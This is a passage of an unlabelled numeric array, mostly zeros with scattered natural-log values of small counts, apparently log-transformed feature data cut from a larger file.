0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0,\n 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 4.418840607796598, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, \n 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 3.784189633918261, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0,\n 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.828313737302301, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 5.723585101952381, \n 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, \n 0.0, 0.0, 2.1972245773362196, 3.784189633918261, 0.0, 0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 2.6390573296152584, 0.0, 3.044522437723423, 0.0, 1.0986122886681098, \n 0.0, 0.0, 0, 0.0, 0.0, 4.394449154672439, 0.0, 4.518263445217987, 0.0, \n 0.0, 0.0, 0.0, 4.189654742026425, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 5.10594547390058, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, \n 3.258096538021482, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.784189633918261, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.3978952727983707, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 6.059123195581797, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 5.723585101952381, 1.6094379124341003, 0, \n 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 4.160336650881089, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, \n 1.3862943611198906, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.833213344056216, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.178053830347946, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 3.5263605246161616, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 